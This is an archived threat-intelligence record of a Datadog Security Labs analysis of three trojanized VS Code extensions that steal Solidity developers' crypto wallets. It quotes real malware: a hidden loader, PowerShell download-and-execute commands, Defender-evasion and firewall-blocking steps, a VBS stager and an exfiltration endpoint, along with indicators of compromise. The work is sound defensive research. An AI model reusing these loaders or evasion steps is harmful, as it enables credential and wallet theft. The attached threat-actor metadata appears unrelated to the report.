{ "id": "1e78e72f-8ca8-47b5-8b7b-37a35ea8b248", "created_at": "2026-04-06T00:20:03.217285Z", "updated_at": "2026-04-10T03:36:48.361987Z", "deleted_at": null, "sha1_hash": "c6f88dc04b2072f43dc6ff6cab59e255e3a4e982", "title": "The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions | Datadog Security Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2789471, "plain_text": "The obfuscation game: MUT-9332 targets Solidity developers via\r\nmalicious VS Code extensions | Datadog Security Labs\r\nBy Tesnim Hamdouni, Ian Kretz, Andy Giron, Eslam Salem\r\nPublished: 2025-05-21 · Archived: 2026-04-05 13:17:04 UTC\r\nKey points and observations\r\nDatadog Security Research discovered three malicious VS Code extensions that target Solidity developers on\r\nWindows: solaibot , among-eth , and blankebesxstnion .\r\nThe extensions disguise themselves as legitimate, concealing harmful code within genuine features, and use\r\ncommand and control domains that appear relevant to Solidity and that would not typically be flagged as\r\nmalicious.\r\nAll three extensions employ complex infection chains that involve multiple stages of obfuscated malware,\r\nincluding one that uses a payload hidden inside an image file hosted on the Internet Archive.\r\nVia a delivered malicious browser extension and executable, the attack establishes persistence on the victim\r\nsystem and exfiltrates victim data and credentials to attacker infrastructure.\r\nBased on shared infrastructure and obfuscation characteristics, we attribute all three extensions to a single threat\r\nactor, which we track as MUT-9332, that was also behind a recently reported campaign to distribute a Monero\r\ncryptominer via backdoored VS Code extensions.\r\nBackground\r\nOver the past few years, Visual Studio Code (VS Code) has become the most common choice of integrated\r\ndevelopment environment (IDE), with 74% of developers reporting that they use it as their primary code editor. A\r\nsignificant factor in VS Code’s success is its extensibility; it features a wide range of extensions available for\r\ninstallation from the official VS Code Marketplace. Extensions can modify the appearance or functionality of the VS\r\nCode editor, changing the editor theme, registering new editor commands, running language server protocols or AI\r\ncode assistants, and much more. At time of writing, more than 72,000 extensions were active and installable via the\r\nMarketplace.\r\nFor threat actors, VS Code extensions have certain very appealing qualities:\r\nThey have extensive permissions to read code and environment variables, register commands and write\r\nconfiguration, perform startup actions, and even run system commands as the current user.\r\nThey are one-click installable from within the VS Code editor, lowering the barrier to entry for developers to\r\nregularly try out new extensions.\r\nThey are subject to automated security scanning by the Marketplace before publication, which can lead some\r\ndevelopers to think that extensions have been thoroughly vetted and are thus trustworthy.\r\nThey provide a direct attack path to developers, who are frequently targeted for their access to valuable or\r\nsensitive resources.\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 1 of 14\n\nIt would appear that threat actors have also noticed these qualities: Microsoft has removed several malicious VS Code\r\nextensions from the Marketplace in recent months. Ten of these removed extensions were part of a significant\r\ncampaign to deliver a Monero cryptominer and were cumulatively downloaded up to one million times.\r\nIn this blog post, we analyze a new campaign from a threat actor we track as MUT-9332 that uses three previously\r\nunreported malicious VS Code extensions to target developers using Solidity, a programming language for writing\r\nEthereum blockchain smart contracts. We use the MUT (Mysterious Unattributed Threat) designation to track\r\nunattributed threat actor clusters. By impersonating legitimate publishers or claiming to provide advanced Solidity\r\nfeatures, these extensions infect victims with malware, exfiltrate data and credentials to attacker infrastructure, and\r\nestablish persistence on targeted systems.\r\nDown the rabbit hole: The initial attack vector\r\nWe discovered the VS Code extensions solaibot , among-eth , and blankebesxstnion while threat hunting for\r\nmalicious VS Code extensions in the Marketplace. These extensions purport to provide utilities like syntax scanning\r\nand vulnerability detection for Solidity developers. In reality, all three are trojanized and deliver malicious payloads\r\nthat steal cryptowallet credentials from victim Windows systems.\r\nAll three extensions have been removed from the VS Code Marketplace. Based on metadata provided by the\r\nMarketplace, we estimate that they had been cumulatively downloaded (and thus installed) fewer than 50 times before\r\nremoval.\r\nExtension name Version Publisher Publishing date Removal date Publisher domain\r\nsolaibot 1.4.2 SmartContractAI 2025-04-23 2025-04-28 solidity[.]bot\r\namong-eth 1.0.2 EthCompiler 2025-05-10 2025-05-11 https://nethereum.com\r\nblankebesxstnion 1.0.2 JohnGaffney 2025-05-11 2025-05-12 https://microsoft.com\r\nAside from minor differences in their package.json files, the extensions are identical in file structure and contents. In\r\nparticular, all contain a lightly obfuscated JavaScript source file, extension.js . For VS Code extensions written in\r\nNode.js, extension.js is a distinguished file that contains the code to run when the extension is loaded. Naturally, all\r\nthree extensions configured themselves to be loaded whenever VS Code was launched or when a Solidity source file\r\nwas opened.\r\nWe found that the obfuscated code in extension.js implements genuine Solidity utilities but also conceals the\r\nfollowing malicious section (formatted for clarity):\r\nconst e = {\r\n hostname: \"solidity[.]bot\",\r\n path: \"/version.json/\",\r\n method: \"GET\",\r\n headers: {\r\n Platform: p.default.platform().toString(),\r\n Accept: \"application/json\",\r\n Referer: \"https://solidity[.]bot/\"\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 2 of 14\n\n}\r\n },\r\n t = g.default.request(e, (e =\u003e {\r\n let t = \"\";\r\n e.on(\"data\", (e =\u003e {\r\n t += e\r\n })),\r\n e.on(\"end\", (() =\u003e {\r\n try {\r\n const e = JSON.parse(t);\r\n if (\"v1.4.2\" === e.version) console.log(\"Version is up to date!\");\r\n else if (\"v1.4.1\" === e.version) {\r\n console.log(\"Outdated version, checking hash...\");\r\n const t = e.version_hash,\r\n n = this.decode_hash(t);\r\n (0, h.exec)(n)\r\n }\r\n } catch (e) {\r\n console.error(\"Invalid JSON:\", e)\r\n }\r\n }))\r\n }));\r\nThis code makes an HTTP GET request to https://solidity[.]bot/version.json that includes the system’s\r\nplatform string in the headers. If the version attribute of the response JSON has value ”v1.4.1” the\r\nversion_hash attribute of the response is decoded from hex to characters ( decode_hash() ) and executed in a\r\nsubprocess.\r\nBy interacting with the solidity[.]bot server, we found that ”v1.4.1” was only returned when the platform string\r\nindicated a Windows system. In this case, the response had the following structure:\r\n{\r\n \"name\": \"Solidity AI\",\r\n \"version\": \"v1.4.1\",\r\n \"version_hash\": \"706F7765727368656C6C202D457865637574696F6E506F6C69637920427970617373202D436F6D6D616E64202269726D\r\n}\r\nDecoding this version_hash value from hex to characters, we find at last the command being run:\r\npowershell -ExecutionPolicy Bypass -Command \"irm https://solidity[.]bot/a.txt | iex\"\r\nThis PowerShell command downloads and executes https://solidity[.]bot/a.txt , a suspicious action that, when\r\ncoupled with the use of obfuscation in extension.js , indicates malicious intent. We found that this command is in\r\nfact the start of a complex, multi-stage infection chain, which we map out and explore in the next section.\r\nTechnical analysis\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 3 of 14\n\nThe overall attack flow, beginning with the execution of the a.txt payload, is shown below in Figure 1. Boxes\r\nrepresent distinct named payloads involved in the attack, with target payloads highlighted in purple and arrows\r\nillustrating the direction of invocation between components.\r\nFigure 1: Attack flow overview (click to enlarge)\r\nAs indicated in Figure 1, the attack delivers two target payloads: extension.zip , an extension for Chromium-based\r\nbrowsers, and the executable myau.exe . Both perform malicious actions on the victim system, including exfiltrating\r\ncryptocurrency wallet credentials to attacker infrastructure.\r\nInterestingly, there are two distinct paths through the attack flow diagram to each of these payloads:\r\nextension.zip is downloaded and installed by both the a.txt and 1.txt payloads\r\nmyau.exe is downloaded and executed via two attack paths leading from 1.txt , one of which is significantly\r\nmore complex than the other, relying on more intermediate payloads and techniques\r\nWe believe this redundancy is likely intended to increase the chances of successful payload execution and aid in\r\nevading detection should one obfuscation method be uncovered.\r\nIn the remainder of this section, we walk through the paths and intermediate payloads involved in this attack flow\r\nleading to the target payloads extension.zip and myau.exe . We then analyze the target payloads themselves.\r\nInfection chains and intermediate payloads\r\nThe initial payload in the attack flow, a.txt , is a PowerShell script that begins by attempting to slip a malicious\r\nextension, extension.zip , into Chromium-based browsers installed on the user’s machine. The core logic is\r\ncontained in the Check-And-Replace function, shown below.\r\nfunction Check-And-Replace {\r\n [CmdletBinding()]\r\n param (\r\n [Parameter(Mandatory=$true, Position=0)]\r\n [string]$Path,\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 4 of 14\n\n[string[]]\r\n $BrowserNames = @(\r\n \"Opera GX Browser\", \"Opera GX\", \"Opera Browser\", \"Opera GX Internet Browser\",\r\n \"Opera Internet Browser\", \"Google Chrome\", \"Brave\", \"Brave Browser\",\r\n \"Microsoft Edge\", \"DolphinAnty\", \"Chromium\", \"Yandex\",\r\n \"Yandex Browser\", \"Ungoogled Chromium\", \"Mises\"\r\n ),\r\n [string]\r\n $ExtensionArg = \"--load-extension=`\"$env:APPDATA\\CheckExtension`\"\"\r\n )\r\n if (-not (Test-Path $Path)) {\r\n return\r\n }\r\n Get-ChildItem -Path $Path -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {\r\n $shortcutFile = $_.FullName\r\n $shell = New-Object -ComObject WScript.Shell\r\n $shortcut = $shell.CreateShortcut($shortcutFile)\r\n foreach ($browserName in $BrowserNames) {\r\n if ($_.BaseName -like \"*$browserName*\") {\r\n if ($shortcut.Arguments -notmatch [regex]::Escape($ExtensionArg)) {\r\n $shortcut.Arguments = \"$($shortcut.Arguments) $ExtensionArg\"\r\n $shortcut.Save()\r\n }\r\n else {\r\n }\r\n break\r\n }\r\n }\r\n }\r\n}\r\nAfter downloading and extracting extension.zip into a hidden folder under APPDATA , the script checks to see if it is\r\nrunning with administrator privileges and calls Check-And-Replace if so. This function modifies the shortcuts ( .lnk\r\nfiles) for targeted browsers in Taskbar , Start Menu , Quick Launch , Desktop, and One Drive Desktop to load\r\nthe malicious extension on startup from this hidden folder.\r\nIt then downloads and executes the payload 1.txt from https://solidity[.]bot/1.txt in much the same way as\r\na.txt itself was invoked:\r\npowershell -ExecutionPolicy Bypass -Command \"irm https://solidity[.]bot/1.txt | iex\"\r\n1.txt contains the same payload as a.txt to download and install extension.zip into the victim’s compatible\r\nbrowsers. It is not clear why the payload at this stage was duplicated. The attack path then branches when 1.txt\r\ninvokes two next stages, 2.txt and 3.txt , again by piping a downloaded PowerShell script to iex :\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 5 of 14\n\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Start-Sleep -Seconds 120; irm https://solidity[.]bo\r\npowershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command \"Start-Sleep -Seconds 120; irm https://solidity[.]bot\r\nBoth remaining attack paths ultimately lead to myau.exe , the attack’s second target payload. Over the next two\r\nsections, we separately follow each remaining subpath.\r\nThe 2.txt path\r\nThe script starts by adding a registry key ( App = “crypto” ) under HKEY_CURRENT_USER\\Software\\Microsoft . It then\r\nestablishes persistence via another key under HKEY_CURRENT_USER\\Software\\Microsoft called Application. After it\r\ndisables Windows Defender’s automatic submission of malicious samples, the script adds a random folder,\r\n%localappdata%, under Defender’s exclusion path as well as to the registry under\r\nHKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Paths .\r\nThe script finally makes a request to another command and control (C2) domain,\r\nhttps://myaunet[.]su/\u003crandomId\u003e/\u003crandomId\u003e/\u003crandomId\u003e/\u003crandomId\u003e .\r\n$QdHohq8z7aFLPrEGgoX7dfN8kvhS = \"myau\"\r\n$TjxLlCbWKIaLPzNk28sqmhWL58Zo7altSZzF = \"https://\"\r\n$m4eNWOkl5jp3WQh9bwqN31Puj9sJqS2M3KjdeoD1bNSuChf2m = \"net.su\"\r\n$CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH = $TjxLlCbWKIaLPzNk28sqmhWL58Zo7altSZzF + $QdHohq8z7aFLPrEGgoX7dfN8kvhS\r\n$CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH = $CqVnU6XxTsDIWg1AQhEPxVOFguF2ng0BaFgKbHFOlH + $m4eNWOkl5jp3WQh9bwqN31Pu\r\n......\r\nThe myaunet[.]su C2 domain had been previously observed to deliver a Monero cryptominer via backdoored VS\r\nCode extensions. Based on the shared C2 infrastructure, we are moderately confident that MUT-9332 is also the threat\r\nactor behind the Monero campaign.\r\nThe script then constructs a large Base64-encoded string spread across multiple variables. It replaces all instances of\r\n“#2##” with the letter “A” to form a final Base64 payload. It decodes this payload into a file named Launch.exe ,\r\nwrites it to disk, and executes it with elevated privileges if possible. To further conceal its activities, the script sets two\r\nattributes on Launch.exe :\r\nHidden ( +H ), which makes the file invisible in File Explorer by default\r\nSystem ( +S ), which identifies the file as a critical system component.\r\n$ekCp5C557Z0pSNsJ08iq8V80hqJI = Join-Path $VPYNTNhQpLzx3oMuuvDZeea5h6OPE \"Launch.exe\"\r\n...\r\n[System.IO.File]::WriteAllBytes($ekCp5C557Z0pSNsJ08iq8V80hqJI, $sx2qp84mQy42m3wUmsojQs4BUaix4c4KFZMrvE)\r\nattrib +H +S $ekCp5C557Z0pSNsJ08iq8V80hqJI\r\nStart-Process \"cmd.exe\" -ArgumentList \"/c reg add \"\"HKCU\\Software\\Microsoft\"\" /v \"\"Version\"\" /t REG_SZ /d $Hp3dV2hGEh\r\nStart-Sleep -s 3\r\nStart-Process $ekCp5C557Z0pSNsJ08iq8V80hqJI -Verb \"RunAs\" -WindowStyle Hidden\r\nLaunch.exe is just myau.exe under a different name. All subsequent malicious actions—like disabling updates,\r\ninjecting into browsers, or exfiltrating data—stem from this binary.\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 6 of 14\n\nThe 3.txt path\r\nIn contrast with 2.txt , the 3.txt payload only downloads and executes a VBScript (VBS), a.vbs , from\r\nhttps://solidity[.]bot/a.vbs :\r\n$url = \"https://solidity[.]bot/a.vbs\"\r\n$localFile = \"$env:temp\\a.vbs\"\r\nInvoke-WebRequest -Uri $url -OutFile $localFile\r\nStart-Process -FilePath \"cscript.exe\" -WindowStyle Hidden -ArgumentList $localFile\r\nStart-Sleep -Seconds 600\r\nRemove-Item -Path $localFile -Force\r\nThe a.vbs script is lightly obfuscated via corruption by intermittent insertions of the character string\r\nȧⳛܖᖳ᎑໴ឺ┰ഴ♛ፙឳʿᰤම into the script text, as shown below. This is presumably done to frustrate static analysis and\r\nautomated malware detection mechanisms.\r\nFigure 2: Obfuscated VBS script in `a.vbs` payload (click to enlarge)\r\nThese extra characters are removed at runtime to reveal the following script, which creates an MSXML2.ServerXMLHTTP\r\nobject that downloads and executes content from http://paste[.]ee/d/0ykW3Z2K/0 :\r\nOn Error Resume Next\r\nDim pedireme, motorcars, therblig, aubain, intruders, spinel\r\naubain = \"MSXML2.ServerXMLHTTP\"\r\ntherblig = \"http://paste[.]ee/d/0ykW3Z2K/0\"\r\nintruders = \"GET\"\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 7 of 14\n\nspinel = \"responseText\"\r\nSet pedireme = CreateObject(aubain)\r\npedireme.Open intruders, therblig, False\r\npedireme.Send\r\nmotorcars = Eval(\"pedireme.\" \u0026 spinel)\r\nExecuteGlobal motorcars\r\nA detour into “steganography”\r\nThe data fetched from the paste[.]ee domain is another corrupted VBS script that is repaired at runtime using the\r\nsame technique as before. The repaired script sets up and runs a PowerShell command invoked with the Base64-\r\nencoded argument celom that itself references an image file ( new_image.jpg ) hosted on the Internet Archive (since\r\nremoved).\r\ninterregency = \"$liblong = '\" \u0026 celom \u0026 \"' -replace 'ȧⳛܖᖳ᎑໴ឺ┰ഴ♛ፙឳʿᰤම','';\"\r\ninterregency = interregency \u0026 \"$delope = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($liblo\r\ninterregency = interregency \u0026 \"Invoke-Expression $delope;\"\r\nDim propiolic\r\npropiolic = \"powershell -nop -w hidden -c \" \u0026 Chr(34) \u0026 interregency \u0026 Chr(34)\r\nCreateObject(\"WScript.Shell\").Run propiolic, 0, False\r\nWhen decoded, celom contains the following VBS script:\r\n$unsuspiciously = '0/0VUbd12h/d/ee.etsap//:ptth';\r\n$pilpul = $unsuspiciously -replace '#', 't';\r\n$goondie = 'https://archive[.]org/download/new_image_20250509_1852/new_image.jpg';\r\n$quivery = New-Object System.Net.WebClient;\r\n$quivery.Headers.Add('User-Agent','Mozilla/5.0');\r\n$episternum = $quivery.DownloadData($goondie);\r\n$philocrats = [System.Text.Encoding]::UTF8.GetString($episternum);\r\n$pancratia = '\u003c\r\nAs far as we can tell, this script is incomplete or broken, meaning the threat actor loses code execution at this stage.\r\nHowever, we can glimpse what their intentions must have been: to retrieve and decode a hidden Base64-encoded\r\npayload in new_image.jpg , pictured below.\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 8 of 14\n\nFigure 3: Screenshot of the image containing the myau.exe payload (click to enlarge)\r\nIndeed, by running the strings command on new_image.jpg , we found the myau.exe payload as Base64-encoded\r\ntext. Rather than being hidden in the image data via true steganographic techniques, this payload has simply been\r\ninserted into the image file.\r\n$ strings new_image.jpg\r\n...\r\n2[9(\r\n2d8$\r\n\u003c\u003cBASE64_START\u003e\u003eTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBT\r\n...\r\nThus, the attacker’s intention on this significantly more elaborate path was once again to run myau.exe on the victim\r\nsystem.\r\nTarget payloads\r\nextension.zip\r\nThe overall execution flow of the Chromium-based browser extension in extension.zip is shown below in Figure 4.\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 9 of 14\n\nFigure 4: Execution flow of the extension.zip browser extension (click to enlarge)\r\nThis browser extension consists mainly of three JavaScript files, injected.js , content.js , and h.js , which work\r\ntogether to steal Ethereum wallets and leak them to a C2 endpoint.\r\nFirst, injected.js sends an Ethereum address to content.js , which then forwards both the address and the current\r\npage’s URL to the remote C2 server ( solidity[.]bot/fetchPrices ). Upon receiving the server’s reply, content.js\r\nchecks its status and, if it’s valid, proceeds to launch the h.js script for further processing. The latter script is heavily\r\nobfuscated and appears to call Ethereum libraries to check the validity of the private key.\r\nmyau.exe\r\nUpon execution, myau.exe initiates various defense evasion techniques. It disables Windows Defender scanning by\r\nissuing a PowerShell command to add a directory exclusion under %LocalAppData% . It also establishes a volatile anti-forensic technique by invoking RtlSetProcessIsCritical(true) via ntdll.dll , causing the system to crash if the\r\nmalware process is terminated. This behavior is reinforced by modifying system recovery settings, including setting the\r\nNoReboot registry key and disabling the Windows Recovery Environment using reagentc .\r\nstring folderPath = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData);\r\nstring SystemDrive = Path.Combine(folderPath, RegistryKeys.GetKey());\r\nawait Myau.ExecuteCommand(\"powershell -Command \\\"Add-MpPreference -ExclusionPath '\" + SystemDrive + \"'\\\"\");\r\nmyau.exe then proceeds to build a dynamic URL and issues an HTTP GET request using the custom user-agent\r\nMyauNET/1.0 , an indicator that was also previously observed in the aforementioned campaign from MUT-9332. Upon\r\nestablishing a connection to the C2 server at https://myaunet[.]su/HprEZkZZZrtZEH/TMDSRNerS , the malware\r\nvalidates the downloaded payload by inspecting its size prior to execution.\r\nmyaunet.exe\r\nThe next-stage component, myaunet.exe , functions primarily as a credential and infostealer. It enumerates LevelDB\r\nfiles within application data directories for Discord, Chromium-based browsers, cryptocurrency wallets, and Electron\r\napplications.\r\nThe malware modifies the Windows hosts file to sinkhole connections to domains associated with antivirus vendors,\r\nsandbox environments, and threat intelligence providers. Additionally, the malware creates a firewall rule via netsh\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 10 of 14\n\nto block outbound connectivity to Microsoft update and telemetry infrastructure, likely to prevent detection and\r\ninterference from Windows security updates or Defender cloud-based protections.\r\nstring cmd = \"netsh advfirewall firewall add rule name=\\\"Windows Updater\\\" dir=out action=block \" +\r\n \"remoteip=20.190.128.0/18,40.76.0.0/14,13.107.4.50,13.107.5.88 enable=yes\";\r\nProgram.Run(cmd);\r\nData is exfiltrated via HTTP POST to https://m-vn[.]ws/bird.php . The request contains a JSON payload with\r\nfields including cpu , method , installed_at , tokens , and wallets , enabling victim profiling and tracking.\r\nstring text = string.Join(\"\\n\", Tokens);\r\nstring text2 = \"https://m-vn.ws/bird[.]php\";\r\nProgram.Payload payload = new Program.Payload\r\nAs a final stage, the malware retrieves and executes an additional payload from\r\nhttps://begalinokotobananinotrippitroppacrocofanclub[.]su , which has been previously associated with the\r\nQuasar Remote Access Trojan (Quasar RAT).\r\nConclusion\r\nThis campaign demonstrates the surprising and creative lengths to which MUT-9332 is willing to go when it comes to\r\nconcealing their malicious intentions. We see in this case an impressive diversity of techniques used, ranging from the\r\nstandard (providing legitimate functionality alongside malware, using plausible-sounding C2 domains) to the more\r\nunusual (multiple virtually identical stages, shipping a corrupted payload that is repaired at runtime), and even to the\r\nhalfhearted ARG-like flourish of hiding malware inside a publicly accessible image file. These techniques make the\r\ncampaign more difficult to detect and the attack flow more challenging to follow.\r\nWhat’s more, this campaign may be ongoing: at time of writing, long after the removal of the extensions from the VS\r\nCode Marketplace, we observed MUT-9332 make edits to multiple intermediate payloads. They also appear to have\r\nrealized that they have been detected; the following (edited for language) was taken from the updated 1.txt payload:\r\n# F*** you security analyst. Your info has been saved\r\nNotable changes include:\r\nUpdated C2 domains and image payload URL following the latter being removed from the Internet Archive.\r\nThe new image file is visually identical to the previous one and appears to contain the same payload\r\nRemoved the extension.zip downloader portion of 1.txt\r\nThese payload updates suggest that this campaign will likely continue, and the detection and removal of this first batch\r\nof malicious VS Code extensions may prompt MUT-9332 to change tactics in subsequent ones.\r\nIndicators of Compromise\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 11 of 14\n\nVS Code Extensions\r\nName Version Context\r\namong-eth 1.0.2 Malicious VS Code extension used in campaign\r\nblankebesxstnion 1.0.2 Malicious VS Code extension used in campaign\r\nsolaibot 1.4.2 Malicious VS Code extension used in campaign\r\nURLS\r\nURL Context\r\nsolidity[.]bot\r\nMain attack C2 server for\r\ndelivering early-stage payloads\r\nand exfiltrating data\r\nhttps://myaunet[.]su\r\nPayload delivery server for\r\nMonero cryptominer\r\nhttp://paste[.]ee/d/0ykW3Z2K/0\r\nPayload delivery server for\r\nmalicious VBS script\r\nhttps://archive[.]org/download/new_image_20250509_1852/new_image.jpg\r\nURL of the new_image.jpg\r\nimage containing myau.exe\r\npayload\r\nhttps://m-vn[.]ws/bird.php\r\nExfiltration server to which\r\nvictim data and credentials are\r\nPOSTed by myaunet.exe\r\nhttps://begalinokotobananinotrippitroppacrocofanclub[.]su\r\nPayload delivery server for\r\nQuasar RAT\r\nArtifacts\r\nFile SHA256 Context\r\namong-eth.vsix ce72b79e324371134db762fe70b8b1789af899d7217461bc3658a6bd84743eb6\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 12 of 14\n\nFile SHA256 Context\r\nblankebesxstnion.vsix e19d5d8f941b9a98fbb3b65e1e6077fa00d97529e351e455297b0204ec07e9ed\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nsolaibot.vsix 209fb5bb2440ffe1a631dfe3b574229105a33c5153eded023cc77d8e8f81d1de\r\nVSIX\r\narchive of\r\nmalicious\r\nVS Code\r\nextension\r\nused in\r\ncampaign\r\nextension.zip e0ca66c1a9a68b319b24a7c6b8fdca219dffd802dd4de2d59f602c4d90f40d6c\r\nMalicious\r\nChromium-based\r\nbrowser\r\nextension\r\nmyau.exe c5c0228a1e0ba2bb748219325f66acf17078a26165b45728d8e98150377aa068\r\nMalicious\r\nPE\r\nexecutable,\r\ndisables\r\nWindows\r\nsecurity\r\nmeasures\r\nmyaunet.exe a1eadd41327bd8736e275627d3953944fe7089c032d72a3e429ff18ad0958ada\r\nMalicious\r\nPE\r\nexecutable,\r\ninfostealer\r\nwmam.exe c3684164933c3f54d5b0b242a8a906a85d633de479079a820bb804c0f73c0f58\r\nMalicious\r\nPE\r\nexecutable,\r\nQuasar\r\nRemote\r\nAccess\r\nTrojan\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 13 of 14\n\nSource: https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nhttps://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads\r\nPage 14 of 14", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://securitylabs.datadoghq.com/articles/mut-9332-malicious-solidity-vscode-extensions/#infection-chains-and-intermediate-payloads" ], "report_names": [ "#infection-chains-and-intermediate-payloads" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434803, "ts_updated_at": 1775792208, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.pdf", "text": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.txt", "img": "https://archive.orkl.eu/c6f88dc04b2072f43dc6ff6cab59e255e3a4e982.jpg" } }